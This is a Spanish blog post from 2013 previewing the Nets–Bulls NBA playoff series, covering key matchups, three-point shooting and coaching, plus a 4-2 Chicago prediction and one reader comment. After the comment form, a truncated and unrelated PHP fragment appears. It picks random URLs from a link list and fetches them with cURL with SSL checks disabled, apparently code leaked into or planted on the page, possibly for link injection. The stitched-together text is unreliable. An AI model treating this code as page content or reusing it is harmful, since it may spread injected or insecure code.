Previa Brooklyn Nets – Chicago Bulls

20 de April de 2013 por Viva_Dirk

Interesantísima primera ronda que enfrenta a dos modelos opuestos. Con ventaja de campo llega el proyecto de relumbrón de Brooklyn, a base de asumir sin problema grandes contratos si a cambio llegaba talento a la franquicia. En frente, un bloque sin físuras y desde la baja de Derrick Rose, sin estrellas. A la ausencia casi segura de Rose durante toda la serie hay que unir la duda de Noah, que parece que no jugará el primer partido. Aún más difícil para Chicago, que hasta la fecha ha sacado el 110% de todo lo que tiene.

Varios factores parecen favorecer a los Nets en un enfrentamiento directo y, sin embargo, el balance esta temporada es de 3-1 para los Bulls, que sólo perdieron en un partido sin Boozer ni Noah. Una de las mejores defensas de la competición, donde ningún jugador llega a 17 puntos por noche y donde su entrenador es pieza fundamental en el funcionamiento del equipo, se enfrenta a una plantilla donde no falta ninguna arma ofensiva y ha cambiado de entrenador a mitad de curso por ser incapaz de sacar todo el provecho. Sin duda, dos estilos opuestos. Ni qué decir tiene que si Derrick Rose apareciese por sorpresa en la serie, buena parte de este análisis perdería sentido.

Claves de la eliminatoria:

Talento vs trabajo: Como hemos dicho los Nets tienen una hoja de ruta mucho menos marcada que los Bulls, el talento e inspiración de Deron Williams marcan buena parte de sus resultados, asi como la capacidad anotadora de Brook Lopez y Joe Johnson, y la aportación desde el banco de Blatche y Brooks. Por su parte los Bulls llevan sus partidos a un ritmo muy lento, basan su poder en una defensa capaz de secar a cualquiera y su ofensiva no está anclada a un solo hombre, aunque tampoco tienen un referente donde mirar en momentos de crisis.

Tiro exterior: Los Bulls son el 2º equipo que menos triples lanza de la competición mientras que los Nets ocupan el 7º lugar. Si JJ y Deron estan acertados la defensa de los Bulls se verá obligada a dejar mas espacio para Brook Lopez, de igual modo que Boozer y Noah van a tener muy pocos si sus compañeros no mejoran esta faceta. También desde el banco los Nets disponen de tiradores mas fiables que los Bulls.

Deron Williams: La ausencia de Rose nos priva de un gran duelo a los espectadores y da aun mayor protagonismo al jugador franquicia de los Nets. Ninguno de los bases rivales puede defenderlo en el uno contra uno, asi que los desequilibrios que cree y como los aproveche serán fundamentales para desarbolar la defensa de Thibbodeau.

CoY vs Interino: Tom Thibbodeau ya ha sido premiado como mejor entrenador y quedado 2º en las votaciones en sus 2 campañas con los Bulls, mientras que PJ Carlesimo no ha tenido exito alguno como entrenador jefe. Los ajustes que pueda hacer Thibbodeau ante el mayor talento del equipo rival serán fundamentales en el resultado de la eliminatoria.

Pronóstico: 4-2 Chicago.

Comenta

Un comentario a esta entrada

  1. Tobal dice:
    #1

    Aquí pienso que los Brooklyn Nets,son bastante favoritos,tienen más plantilla y más anotadores que Chicago y encima mejores tiradores,apostaría por un 4 – 1 para Brooklyn.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>